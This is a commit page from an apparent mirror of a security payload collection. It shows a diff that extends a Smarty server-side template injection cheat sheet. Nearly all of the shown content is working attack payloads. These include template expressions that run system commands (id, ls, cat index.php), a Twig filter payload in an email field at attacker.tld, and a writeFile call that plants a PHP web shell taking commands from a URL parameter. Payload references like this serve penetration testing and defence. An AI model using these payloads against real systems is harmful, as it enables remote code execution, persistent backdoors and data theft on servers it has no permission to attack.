mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-21 02:38:50 +00:00
Merge pull request #366 from mpgn/master
Update Smarty Template Injection
This commit is contained in:
commit
e3e3ca6ba2
@ -233,8 +233,10 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
||||
|
||||
```python
|
||||
{$smarty.version}
|
||||
{php}echo `id`;{/php}
|
||||
{php}echo `id`;{/php} //deprecated in smarty v3
|
||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||
{system('ls')} // compatible v3
|
||||
{system('cat index.php')} // compatible v3
|
||||
```
|
||||
|
||||
## Freemarker
|
||||
|
Loading…
Reference in New Issue
Block a user